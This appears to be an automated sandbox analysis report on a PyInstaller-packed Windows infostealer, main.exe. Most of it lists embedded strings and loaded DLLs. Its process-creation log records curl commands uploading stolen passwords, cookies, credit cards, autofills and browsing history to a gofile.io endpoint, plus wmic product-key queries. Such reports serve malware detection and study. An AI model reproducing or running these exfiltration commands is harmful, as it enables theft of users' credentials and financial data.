Source: main.exe, 00000002.00000003.1914422179.000001ED8C7CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: main.exe, 00000002.00000003.1950643827.000001ED8D400000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959875871.000001ED8D407000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911117871.000001ED8D3F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941809930.000001ED8D3F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: main.exe, 00000002.00000003.1950643827.000001ED8D400000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959875871.000001ED8D407000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911117871.000001ED8D3F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914422179.000001ED8C7CF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941809930.000001ED8D3F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
Source: main.exe, 00000002.00000003.1772103257.000001ED8C2CC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1771560505.000001ED8C2AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1956147178.000001ED8C670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: main.exe, 00000002.00000003.1924977485.000001ED8D315000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1921292444.000001ED8D705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: main.exe, 00000002.00000003.1925833686.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961782194.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1921292444.000001ED8D705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/;
Source: main.exe, 00000002.00000003.1771560505.000001ED8C163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: main.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931211381.000001ED8D840000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1962816126.000001ED8D841000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1949750996.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924199076.000001ED8D82E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907759919.000001ED8D82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1942764256.000001ED8D841000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1933446221.000001ED8D340000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924977485.000001ED8D315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: main.exe, 00000002.00000003.1903709934.000001ED8D360000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926171009.000001ED8D363000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1916973619.000001ED8D362000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1950516555.000001ED8D368000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959788649.000001ED8D3E3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929213253.000001ED8D363000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938883723.000001ED8D3E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
Source: main.exe, 00000002.00000003.1904928536.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1912333326.000001ED8CB37000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1949238926.000001ED8CB3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: main.exe, 00000002.00000003.1771560505.000001ED8C2AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: main.exe, 00000002.00000003.1918350007.000001ED8D7B9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909476038.000001ED8D791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: main.exe, 00000002.00000003.1771560505.000001ED8C163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: main.exe, 00000002.00000003.1949430351.000001ED8D4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: main.exe, 00000002.00000003.1927231579.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1956596958.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931812031.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929359605.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1913347833.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: main.exe, 00000002.00000003.1928933984.000001ED8D916000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1937262511.000001ED8D928000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904753768.000001ED8D880000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1963159329.000001ED8D928000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904841401.000001ED8D8A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924011561.000001ED8D8A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc72
Source: main.exe, 00000002.00000002.1956147178.000001ED8C670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
Source: main.exe, 00000002.00000002.1962378008.000001ED8D7AC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930325157.000001ED8D7A9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931699271.000001ED8D7AC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909476038.000001ED8D791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
Source: main.exe, 00000002.00000003.1911763765.000001ED8C052000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927114013.000001ED8C065000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924130073.000001ED8C053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wiki.debian.org/XDGBaseDirectorySpecification#state
Source: main.exe, 00000002.00000003.1928622951.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930531879.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1962573654.000001ED8D804000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1918350007.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1932981213.000001ED8D801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: main.exe, 00000002.00000003.1904551547.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930251995.000001ED8D41E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: main.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1933446221.000001ED8D340000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924977485.000001ED8D315000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1946091649.000001ED8D34D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: main.exe, 00000002.00000003.1756603875.000001ED8C09B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1756807255.000001ED8C0AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1952715008.000001ED8BBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: main.exe, 00000002.00000003.1903709934.000001ED8D360000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D38E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904551547.000001ED8D391000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935034726.000001ED8D393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: main.exe, 00000002.00000003.1925833686.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961913080.000001ED8D715000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1921292444.000001ED8D705000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926815697.000001ED8D710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: main.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941583881.000001ED8D4DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: main.exe, 00000002.00000003.1914711565.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925966743.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CB4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958011767.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1936495508.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1957482809.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1906717397.000001ED8CB5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: C:\Users\user\Desktop\main.exe Code function: String function: 00007FF6ABA41E50 appears 53 times
Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.0.dr Static PE information: No import functions for PE file found
Source: main.exe Binary or memory string: OriginalFilename_lzma.pyd. vs main.exe
Source: main.exe Binary or memory string: OriginalFilename_bz2.pyd. vs main.exe
Source: main.exe Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs main.exe
Source: main.exe Binary or memory string: OriginalFilename_hashlib.pyd. vs main.exe
Source: main.exe Binary or memory string: OriginalFilenamevcruntime140.dllT vs main.exe
Source: main.exe Binary or memory string: OriginalFilenamewin32ui.pyd0 vs main.exe
Source: main.exe Binary or memory string: OriginalFilename_asyncio.pyd. vs main.exe
Source: main.exe Binary or memory string: OriginalFilename_elementtree.pyd. vs main.exe
Source: main.exe Binary or memory string: OriginalFilename_multiprocessing.pyd. vs main.exe
Source: main.exe Binary or memory string: OriginalFilename_ctypes.pyd. vs main.exe
Source: main.exe Binary or memory string: OriginalFilename_overlapped.pyd. vs main.exe
Source: main.exe Binary or memory string: OriginalFilename_decimal.pyd. vs main.exe
Source: main.exe Binary or memory string: OriginalFilenamepython3.dll. vs main.exe
Source: classification engine Classification label: mal68.spyw.evad.winEXE@37/137@2/2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_03
Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI44642
Source: main.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\main.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: main.exe Virustotal: Detection: 23%
Source: C:\Users\user\Desktop\main.exe File read: C:\Users\user\Desktop\main.exe
Source: unknown Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\main.exe Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey
Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: libffi-8.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: libcrypto-3.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: libssl-3.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: pdh.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: sqlite3.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\main.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: main.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: main.exeStatic file information: File size 27577634 > 1048576
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: main.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1730318775.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.1966975861.00000237BBB18000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1951939733.000001ED8A2DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.1966975861.00000237BBB18000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1951939733.000001ED8A2DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1730126342.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
